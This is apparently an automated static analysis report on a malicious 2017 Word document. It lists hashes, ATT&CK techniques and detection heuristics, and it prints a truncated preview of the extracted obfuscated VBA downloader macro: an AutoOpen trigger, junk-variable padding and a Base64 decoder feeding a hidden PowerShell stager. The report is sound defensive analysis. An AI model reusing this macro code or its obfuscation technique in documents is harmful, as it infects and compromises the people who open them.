Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc9a0c2c5c51fcab…

MALICIOUS

Office (OLE)

Size: 170.0 KB
Created: 2017-05-03 14:19:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 479f0ae558cf25dfff71ca64b211c0fa
SHA-1: d8b004d706a2930225c1687ad1392603706d80c1
SHA-256: fc9a0c2c5c51fcabe03809e816b4eeff38da25c8a037a235db4dd5a0b991d731
Risk score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, a common technique in malicious documents. The macro uses CreateObject and a Shell() call to execute a Base64-decoded command stager, 'powershell -WindowStyle Hidden'. This indicates that the document's primary purpose is to download and execute a secondary payload, likely for further system compromise.

Heuristics (9)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
  • CreateObject call [high] OLE_VBA_CREATEOBJ
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20141 bytes
SHA-256: f3404853fe249a50ac33fd648e238df78bb5a77b0884a534011d1925d1b21cb0
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim wL27o As Double
wL27o = Fix(6023.1210105047)
Dim ZQ5H4 As Integer
ZQ5H4 = -13034
QtPweZx
End Sub

Attribute VB_Name = "Module2"
Public Function tZXRcgV6m(ByVal MgPsKLy)
Dim HIBfgmSEZ As Integer
HIBfgmSEZ = Sgn(17192)
Dim TpGL5y9 As Byte
TpGL5y9 = 234
Dim Ec7QsJL As Integer
Ec7QsJL = -8069
Dim Zkts6d
Dim XAcn2S

Dim Osp29q As Integer
Osp29q = -28085
Dim IEKb5BW As Double
IEKb5BW = 41868.734472888
Dim pOjSQr2U As Double
pOjSQr2U = Round(54993.659892801)
Dim cHglGXfEZ As Byte
cHglGXfEZ = 91
Dim ed4gJw As Long
ed4gJw = -1127520704
Dim fTyU6vm As String
fTyU6vm = Trim(zSagFKUA7)
Dim hphr2XK8v As Long
hphr2XK8v = Sgn(-1194801248)
Dim RkSKa As Single
RkSKa = 4367.3593044085
Set Zkts6d = CreateObject("msxml2.domdocument")

Dim znDw0YUt As Byte
znDw0YUt = 181
Dim OMPgOEDld As Long
OMPgOEDld = 0
Dim hWX49qI As Boolean
hWX49qI = False
Set XAcn2S = Zkts6d.CreateElement(LRExe5g)
Dim C7hrqJR As Double
C7hrqJR = Sgn(47173.771343594)
Dim o14xvDEqn As Single
o14xvDEqn = Round(10009.55086021)
Dim V3ziJ As Double
V3ziJ = Sgn(12603.994923791)
Dim SwmES As Double
SwmES = Fix(2049.0419553409)
Dim cwfhbWQSo As Double
cwfhbWQSo = Int(19508.710767185)
Dim mmEjCnsk As Integer
mmEjCnsk = -1609
With XAcn2S
Dim nC6U5wjWO As Single
nC6U5wjWO = Sgn(14035.342140401)
Dim xCa8D As Byte
xCa8D = 10
Dim D2hRs
D2hRs = vbNullString
Dim AWm5YItM As Boolean
AWm5YItM = False
Dim qxz6d As String
qxz6d = "s"
XAcn2S.DataType = "bin." & LRExe5g
Dim tnrCg4bZ7 As Long
tnrCg4bZ7 = Sgn(0)
Dim j29C4vM As Boolean
j29C4vM = False
Dim qn0BhzkU As Integer
qn0BhzkU = 25085
Dim nfKuRbVYw As Single
nfKuRbVYw = 48218.248659458
Dim hRIOYu0PX As Long
hRIOYu0PX = Sgn(-1527091192)
Dim gE6PopbA As Byte
gE6PopbA = 138
XAcn2S.Text = MgPsKLy
End With
Dim u83KtkuUM As Single
u83KtkuUM = Int(656.7319859214)
Dim f7XBSPo9 As Integer
f7XBSPo9 = Sgn(-20507)
Dim EVI12su3 As Byte
EVI12su3 = 140
Dim AUcfFq97 As Boolean
AUcfFq97 = False
tZXRcgV6m = cHGFt5MT(XAcn2S.nodeTypedValue)

Dim MeA5RdS As Boolean
MeA5RdS = False
Dim BecExo9XU As Integer
BecExo9XU = -9211
Dim Mdc1k
Mdc1k = StrConv(HHrKFm, vbProperCase)
Dim pWURXw As Single
pWURXw = Sgn(62471.296758132)
Dim rinQ5tc As Double
rinQ5tc = Sgn(41017.865047877)
Set XAcn2S = Nothing
Set Zkts6d = Nothing
End Function
Function cHGFt5MT(Binary)
Dim ft72X
ft72X = Len(vVLP4mb6)
Dim TWljx1weE As Long
TWljx1weE = -670541586
Dim R91MJ As Byte
R91MJ = 6
Const G6Zau2Jwo = 2
Const bI3MKs = 1

Dim HJAfGe As Byte
HJAfGe = 171
Dim q9Pm3r As Integer
q9Pm3r = Sgn(21177)
Dim dybowJ6sc As Long
dybowJ6sc = Sgn(-1505434180)
Dim yFebopq3U As Integer
yFebopq3U = Sgn(-11333)
Dim Dy4OF3f6U As Boolean
Dy4OF3f6U = True
Dim oc1jSvkBM

Dim tuFt5 As Boolean
tuFt5 = True
Dim j4rO2C3U As Long
j4rO2C3U = Sgn(-1118931394)
Dim EdzhLtAUH As Double
EdzhLtAUH = Int(59912.468637654)
Dim FizlBfvN As Byte
FizlBfvN = 168
Set oc1jSvkBM = CreateObject("adodb.stream")
Dim DedbcqpBn As String
DedbcqpBn = StrConv(d7xA0HKy, vbUpperCase)
Dim SmzwYiSD As Integer
SmzwYiSD = Sgn(-24466)
Dim yWieuNyrh As Byte
yWieuNyrh = 210
With oc1jSvkBM

Dim m3NFBvb67 As Boolean
m3NFBvb67 = True
Dim sptEU41 As Byte
sptEU41 = 47
Dim pt30gXUk As String
pt30gXUk = Val("6")
Dim aOpRZlaCn As Single
aOpRZlaCn = Sgn(56397.762254623)
Dim P2FHdxjef As Byte
P2FHdxjef = 69
Dim GizYh As Boolean
GizYh = False
.Type = bI3MKs

Dim yFXgU As Long
yFXgU = 0
Dim RaivV As String
RaivV = Len(yjy9IKBO)
Dim UslLWz1NS As Single
UslLWz1NS = Sgn(9134.7039866976)
.Open
Dim Kqkw1m
Kqkw1m = Len(HhjLC)
Dim xWjuJaeHf As Double
xWjuJaeHf = Sgn(5264.1536890807)
.Write Binary
Dim o1EoM As Single
o1EoM = Sgn(49615.214045028)
Dim SS6XNu As String
SS6
... (truncated)